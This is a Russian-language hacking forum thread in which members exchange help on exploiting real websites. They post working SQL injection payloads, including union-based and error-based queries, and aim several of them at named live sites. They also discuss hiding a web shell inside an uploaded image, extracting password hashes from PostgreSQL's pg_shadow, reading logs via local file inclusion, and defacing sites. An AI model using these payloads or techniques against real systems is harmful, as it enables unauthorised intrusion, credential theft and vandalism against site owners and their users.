Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Что, залил такую картинку и шелл заработал? Круть, надо взять на вооружение
     
    1 person likes this.
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886

    снова из Азербайджанa, и сново дефейс Армянских сайтов?

    не одобряю...


    ---------

    p.s Pashkel я там нашел логи апача , но как не странно файлы пустые, как это возможно? запросы передаются гетом..
     
    _________________________
    #13762 Konqi, 23 Jun 2010
    Last edited: 23 Jun 2010
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Нет, я конечно понимаю, жара и всё такое, но ты разве k2b1~ ? Почему ты мне пишешь про какие-то логи апача? Что за хрень вы тут понаписали вообще на последних двух страницах?)

    Один просит как залить шелл ВМЕСТО картинки из админки (обойти фильтр на разрешение и т.д.), ему советуют вставить в конец картинки код, тот главное потом пишет спасибо (зохавал видать все интырнеты уже новым способом), теперь ты со своими логами - у дурки день открытых дверей?))))

    Или там было написано "у меня кроме админки еще есть LFI"???)))
     
    #13763 Pashkela, 23 Jun 2010
    Last edited: 23 Jun 2010
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    вспомнил ? :)
     
    _________________________
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 Konqi:

    Твоя тема аж на 1399 странице, посмотри номер этой, ты что, правда думаешь, так можно строить диалог? И с чего ты взял, что вот так вот просто можно через 3 страницы и два дня писать: "p.s Pashkel я там нашел логи апача , но как не странно файлы пустые, как это возможно? запросы передаются гетом.." и надеяться на то, что тебя поймут? Тем более ты же дальше пишешь уже про еще 10 ДРУГИХ сайтов - с логикой напряги?)))

    главное "я там нашел" - ыыыыыыыыы
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    Pashkela понимаю =* sorry

    а сейчас можно ответить? ))))
     
    _________________________
  7. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Здравствуйте уважаемые гуру и не только. Есть небольшая проблемка: есть иньекция postgresql 7.4 но иньекция в жопашном месте - select ххх from(select '123%INJ%' as code) as listcode left join то left join это и так далее с толпой сложных и малопонятных джойнов. Само собой простой комментарий -- все не комментирует, так что если поставить ; И написать свой запрос будет лишь ошибка.

    Ошибки выводятся так что данные из бд получить проблем нет, темболее что пользователь суперюзер. Проблема в том что хочу в админку. А она сцука под паролем в htaccess. а без отдельного sql запроса файл, как я поглядел в мануалах, не прочитать.

    Ну я подумал что не проблема - можно подключиться напрямую к серверу бд, ибо доступ к pg_shadow есть. Проблема в том что
    Code:
    array_to_string(array(select passwd::text from pg_shadow+where+usename=getpgusername()),','::text)
    ругается нехорошими словами Query failed: ERROR: значения NULL как элементы массива не поддерживается. Эта ошибка ставит меня в тупик честно говоря - подумал ну мало-ли бывают пустые пароли. но блин какой запрос не составляй - хоть с array хоть без него подтвердить что в базе есть пользователи с не null паролями так и не смог. Странно короче.

    Пы.Сы: таблиц с пользователями в различных бд этого сервака хренова туча все пароли админов не протестил но те что проверил к хтаксессу не подходят.
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    можно, если будет LFI в студию, откуда я знаю, что за логи апача ты там подключаешь и откуда ты берешь к ним пути и видно ли ошибки вообще и т.д.
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    к сожалению в студию не могу,отправлю в пм :)
     
    _________________________
  10. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    вопрос такой:

    есть стандартная скуль, подобрано количество полей, но при попытке вывести данные путем ввода некорректного значения id

    index.php?id=-37+union+select+1,2/*
    index.php?id=3111117+union+select+1,2/*
    index.php?id=37+and+1=2+union+select+1,2/*

    скрипт жалуется на некорректное значение id. есть еще какие-то способы или придется крутить вслепую?
     
  11. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Если ошибка выводится,крути как слепую с выводом в ошибку.
     
  12. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    попробуй типа этого...
    index.php?id=-37)/**/and/**/1=2/**/uNion+all+seLect+null,null+from+information_schema.tables+limit+0,1/*
    есле 5тая версия.. а не какайта там 3-тья иле четвертая..

    и вообще тут уже многие говорили по 100 раз, никто не любит гадать, любо линк в студию либо надейся сам на удачу, и вообще версию хотя б сказал.
    -> +AND+substring(version,1,1)=5
     
    #13772 Дирижабль, 23 Jun 2010
    Last edited: 23 Jun 2010
  13. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    [Feldmarschall], нет, я понимаю конечно лето, мозги совсем плавятся, но как твой пример запроса поможет в вопросе дурито ? И кэп подсказывает что и так про блинд метод знает, но хочет добиться вывода.

    durito, в голову приходит мысль попробовать помутить ченить с условиями типа такого
    index.php?id=37+and+if(5=4,NULL,NUll)+union+select+1,2/*
    но мне почему то кажется что все равно ничего не получится, и оно равносильно этому запросу
    index.php?id=37+and+1=2+union+select+1,2/*
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    вопрос закрыт : отдельное спасибо Pashkel-y :)
     
    _________________________
  15. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Понасоветовали тебе тут чёто не то ребята, ясно же сказано, ругается скрипт на несуществующее значение. Ну давай рассмотрим вот такой естественный способ продолжения логики основного запроса:
    index.php?id=37+limit+0+union+select+1,2/*
    Ну или так:
    index.php?id=37+union+select+1,2+limit+1,1/*
     
  16. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    вот поjaлсута помоqите раскрутить..
    как то не получается
     
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.nortun.am/pages.php?al=news&pid=1&id=568'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+sed_zpages+group+by+2+limit+1)a)--+&act=more
    
     
    1 person likes this.
  18. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/*

    в первом случае The profile is not active!
    во-втором тоже самое

    http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80+limit+0,1/*

    проходит, но толку
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274
    версия базы 4.0.21-log так что все равно брутом надо табелки подбирать
     
  20. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    Gorev брутом тянуть базу юзеров это анреал
     
Loading...
Thread Status:
Not open for further replies.